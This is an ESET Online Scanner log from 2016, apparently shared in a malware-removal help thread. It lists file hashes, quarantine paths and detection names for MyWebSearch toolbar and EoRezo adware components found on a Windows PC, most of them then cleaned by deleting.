sh=DEEB8F25483B404367C4E3068B81B8F9736D0C93 ft=1 fh=c6337ca3d00a8554 vn="a variant of Win32/Toolbar.MyWebSearch.Q potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5zEI\Installr\1.bin\5zEZSETP.dll.vir"
sh=FBCEA2105E097BC11ED144BE6CA2578BE2657E23 ft=1 fh=d85b5eae63d39f3a vn="Win32/Toolbar.MyWebSearch potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5zEI\Installr\1.bin\NP5zEISb.dll.vir"
sh=E8233769C754D5BCBB157625FEFF5D52ACD2F12E ft=1 fh=2dada1fe5e5925e6 vn="a variant of Win32/Adware.EoRezo.BG application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\dply_en_015020180\predm.exe.vir"
sh=24656AA1C6AF207E7A6AFE58E8B9554FBAA925F2 ft=1 fh=d954335ab3899f37 vn="a variant of Win32/Adware.EoRezo.AJ application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Users\levilaing\AppData\Local\dply_en_015020180\updply_en_015020180.exe.vir"
sh=8F4332686FB2009630B0F4BF8B741DB1B69A2F81 ft=1 fh=7116b6357690bbcf vn="multiple threats" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Users\levilaing\AppData\Local\dply_en_015020180\Download\myoffergroup_us6.exe.vir"
sh=0A6805E3DA41FD179A7ED96A555FFB189D585AF7 ft=1 fh=5f407552440fae4d vn="a variant of Win32/Toolbar.MyWebSearch.R potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Users\levilaing\AppData\LocalLow\CouponXplorer_5zEI\Installr\Cache\1564E60F.exe.vir"
sh=AEFB6E46ACC4720555F4EBF9A90C9239DFEAF1BC ft=1 fh=1b346a667a3d96de vn="a variant of Win32/AdkDLLWrapper.A potentially unwanted application" ac=I fn="C:\Users\levilaing\Downloads\BitTorrent.exe"
sh=7397181892470061CBFFF440505149E38063A4F4 ft=1 fh=f85a4e889e8ecfe6 vn="Win32/OpenCandy potentially unsafe application" ac=I fn="C:\Users\levilaing\Downloads\clipgrab-3.4.3.exe"
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=907c7887564b7f4e9369d7832e800278
# end=init
# utc_time=2016-03-10 01:20:35
# local_time=2016-03-10 07:20:35 (-0600, Central Standard Time)
# country="United States"
# osver=6.2.9200 NT
Update Init
Update Download
Update Finalize
Updated modules version: 28515
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=907c7887564b7f4e9369d7832e800278
# end=updated
# utc_time=2016-03-10 01:21:21
# local_time=2016-03-10 07:21:21 (-0600, Central Standard Time)
# country="United States"
# osver=6.2.9200 NT
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=907c7887564b7f4e9369d7832e800278
# engine=28515
# end=finished
# remove_checked=true
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2016-03-10 05:54:18
# local_time=2016-03-10 11:54:18 (-0600, Central Standard Time)
# country="United States"
# lang=1033
# osver=6.2.9200 NT
# compatibility_mode_1='Norton Security'
# compatibility_mode=3604 16777213 100 97 1636519 49413384 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 7066928 10521401 0 0
# scanned=250784
# found=50
# cleaned=50
# scan_time=16377
sh=1A561004F779C2C90442B67289372563F7D3030B ft=1 fh=0f13f5e05ae936b5 vn="Win32/Toolbar.MyWebSearch.T potentially unwanted application (cleaned by deleting)" ac=C fn="C:\FRST\Quarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\NP5zStub.dll.xBAD"
sh=99DF98DFEF4B483889FA88162D20EE46340A5DBE ft=1 fh=e6e2c196b2ffcb6f vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zauxstb.dll.vir"
sh=0FF3588ECB69D2B18C6FAEC012672CA2F60314F6 ft=1 fh=731190b7425307d6 vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zbprtct.dll.vir"
sh=0F78FE90AF015B0A511EDE007BD1791A341E891E ft=1 fh=d4fd6df3b7cf992d vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zbrmon.exe.vir"
sh=12FF3195BDACA5482034AAC3C3E132D5ADA421A9 ft=1 fh=982f80d197512813 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zbrstub.dll.vir"
sh=BAEFCB03679575349E01668C4F0938643BAAA022 ft=1 fh=45ba6b521529362d vn="a variant of Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zdatact.dll.vir"
sh=0C88EFCFA1C77D597111125A6C031CEB47B18BA7 ft=1 fh=b856def4c7346ea3 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zdlghk.dll.vir"
sh=8090E240F528004402B29C11E5072BED79D95384 ft=1 fh=73e118282d8d3c4a vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zdyn.dll.vir"
sh=2CA2EA6CF1AD1FE87C25D4AB6B1C7729E48C6390 ft=1 fh=a34a8b9082c46c86 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zfeedmg.dll.vir"
sh=9788294F2B8AB28DBAE4C73BB61A6B1200BDD89D ft=1 fh=af8ed8fd644fe8ac vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zhighin.exe.vir"
sh=9D54BAF23397E5F1444BC6471052AD234B76FBD3 ft=1 fh=2ab58862c927227b vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zhkstub.dll.vir"
sh=978867B422339E68971E56C49C66F14F2ACD745D ft=1 fh=dd289cd2c7a55037 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zhttpct.dll.vir"
sh=DC971C75FFCE77CC952FB6660A2603E09D62D4D9 ft=1 fh=ac2f97e786bfc982 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zidle.dll.vir"
sh=92AC05FFF3AD68271062A3DCB87E12EE6B816DDB ft=1 fh=acec1e59f99ab2fd vn="a variant of Win32/Toolbar.MyWebSearch.P potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zieovr.dll.vir"
sh=AFCAAC5845D81A407C63733E4A7D007167F96BE8 ft=1 fh=02b0c8de8c8e9f1e vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zimpipe.exe.vir"
sh=556C4FCA5D890F17B7B5040A601B42452A205E29 ft=1 fh=0f2a31b21601aeb5 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zmedint.exe.vir"
sh=3EB4A6A25199E6339EC04F36189C71738DE63CE7 ft=1 fh=eafb3b5bfaf84345 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zmlbtn.dll.vir"
sh=DFD07B722E317D1CDDAAB7D5B31BFAB57CC5E739 ft=1 fh=507b4871517a4ad4 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zmsg.dll.vir"
sh=CBF93E0F6FF8AE054C18BDBE477CBFAF9F467CF9 ft=1 fh=f7d96c65ea0021a5 vn="a variant of Win32/Toolbar.MyWebSearch potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zPlugin.dll.vir"
sh=77C8DC985373B1E5D9035ECB3A831C7DD1ABFD55 ft=1 fh=e1f880731de07609 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zradio.dll.vir"
sh=C5F26031D5E0C487BFF0D60AA44603135BF60395 ft=1 fh=a846ae5344ec78c3 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zregfft.dll.vir"
sh=A2F202F68FEF2A31E9FE3AE124A46B908349778C ft=1 fh=bf17c6b7704b10fd vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zreghk.dll.vir"
sh=65D604A070334183E5034CDEEC5838E46D705794 ft=1 fh=3d9a604351eb1640 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zregiet.dll.vir"
sh=72E48F7F37E208A52AD975EAECAB29FC50223C27 ft=1 fh=958a563919bf5cc2 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zscript.dll.vir"
sh=857980A7B7AB77FF8E34A090CCD76B8BA628E7E4 ft=1 fh=6c9ac10ea3ee1cdd vn="a variant of Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zskin.dll.vir"
sh=496310EE0816B49176E03226DB102FAE9AA452B4 ft=1 fh=ceffc168909c0690 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zsknlcr.dll.vir"
sh=F5946D49A70A64072739370E7BAD592FE4799EA1 ft=1 fh=5bc3efb780caf8fa vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zskplay.exe.vir"
sh=BE21D76E502D546B2D88093E13F07923EB59380B ft=1 fh=7424967c664ed914 vn="a variant of Win32/Toolbar.MyWebSearch.AC potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zSrcAs.dll.vir"
sh=8ACE75F6C2417666AD9D60837B72D78B394C3944 ft=1 fh=ae6d89138faf571c vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zSrchMn.exe.vir"
sh=110033F4A78DCA521E8BA73F75747E4E3B6AE545 ft=1 fh=21686246ae128bdd vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zuabtn.dll.vir"
sh=630D5FC9ACC4932C87263895F554F8C3CB6D4B4A ft=1 fh=b81ce565a99a556c vn="Win64/Toolbar.MyWebSearch.A potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\AppIntegrator64.exe.vir"
sh=374E378A91209732B48C8416D1E9805E98FDCFA9 ft=1 fh=6da58ad1308c1c96 vn="Win64/Toolbar.MyWebSearch.A potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\AppIntegratorStub64.dll.vir"
sh=6902D246F8FC2457C9AE369B094292DE6EB454BC ft=1 fh=b1be847bff3fcf8f vn="a variant of Win32/Toolbar.MyWebSearch.W potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\CREXT.DLL.vir"
sh=FF9F058B12B6C4D9B6256304FA9078E391C7F32C ft=1 fh=6022d103b074fe9f vn="a variant of Win32/Toolbar.MyWebSearch.Z potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\CrExtP5z.exe.vir"
sh=244414D9D39E114E7989C3B35A5FF038508ECFC1 ft=1 fh=0cbd734d892ac7d4 vn="a variant of Win32/Toolbar.MyWebSearch.AI potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\DPNMNGR.DLL.vir"
sh=6FF50369661027A1CD5F5E465F78C78913FF84CC ft=1 fh=c941e5f2ec9d2835 vn="a variant of Win32/Toolbar.MyWebSearch.AI potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\EXEMANAGER.DLL.vir"
sh=3D7CD376DFDB97512A376E85FBB7F04344C051B6 ft=1 fh=e0ed2601e18686d8 vn="Win64/Toolbar.MyWebSearch.A potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\Hpg64.dll.vir"
sh=2F938D8C9A5D3C9C239793346D43193BA1CBFCD6 ft=1 fh=929bde520a5aa0d2 vn="a variant of Win32/Toolbar.MyWebSearch.AU potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\T8EXTEX.DLL.vir"
sh=B8944722E8D577E67925DD4A72D1D8E44C3BC6CA ft=1 fh=6f8a20cf4b11d7b0 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\T8EXTPEX.DLL.vir"
sh=2E85C71E79C5B2A65D8CCDD5B21AFE559102062F ft=1 fh=68336e5d9907ad1c vn="a variant of Win32/Toolbar.MyWebSearch.AC potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\T8TICKER.DLL.vir"
sh=D0787BEAE97CE99982E7F5000772831421FD48E4 ft=1 fh=b650850bda28ebe2 vn="a variant of Win32/Toolbar.MyWebSearch.AU potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\VERIFY.DLL.vir"
sh=499E228EDD239496AC4401619894F45BEB39CB25 ft=1 fh=11b6a11b071ec76e vn="Win32/Toolbar.MyWebSearch potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5zEI\Installr\1.bin\5zEIPlug.dll.vir"
sh=DEEB8F25483B404367C4E3068B81B8F9736D0C93 ft=1 fh=c6337ca3d00a8554 vn="a variant of Win32/Toolbar.MyWebSearch.Q potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5zEI\Installr\1.bin\5zEZSETP.dll.vir"
sh=FBCEA2105E097BC11ED144BE6CA2578BE2657E23 ft=1 fh=d85b5eae63d39f3a vn="Win32/Toolbar.MyWebSearch potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5zEI\Installr\1.bin\NP5zEISb.dll.vir"
sh=E8233769C754D5BCBB157625FEFF5D52ACD2F12E ft=1 fh=2dada1fe5e5925e6 vn="a variant of Win32/Adware.EoRezo.BG application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\dply_en_015020180\predm.exe.vir"
sh=24656AA1C6AF207E7A6AFE58E8B9554FBAA925F2 ft=1 fh=d954335ab3899f37 vn="a variant of Win32/Adware.EoRezo.AJ application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Users\levilaing\AppData\Local\dply_en_015020180\updply_en_015020180.exe.vir"
sh=8F4332686FB2009630B0F4BF8B741DB1B69A2F81 ft=1 fh=7116b6357690bbcf vn="multiple threats (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Users\levilaing\AppData\Local\dply_en_015020180\Download\myoffergroup_us6.exe.vir"
sh=0A6805E3DA41FD179A7ED96A555FFB189D585AF7 ft=1 fh=5f407552440fae4d vn="a variant of Win32/Toolbar.MyWebSearch.R potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Users\levilaing\AppData\LocalLow\CouponXplorer_5zEI\Installr\Cache\1564E60F.exe.vir"
sh=AEFB6E46ACC4720555F4EBF9A90C9239DFEAF1BC ft=1 fh=1b346a667a3d96de vn="a variant of Win32/AdkDLLWrapper.A potentially unwanted application (cleaned by deleting)" ac=C fn="C:\Users\levilaing\Downloads\BitTorrent.exe"
sh=7397181892470061CBFFF440505149E38063A4F4 ft=1 fh=f85a4e889e8ecfe6 vn="Win32/OpenCandy potentially unsafe application (deleted)" ac=C fn="C:\Users\levilaing\Downloads\clipgrab-3.4.3.exe"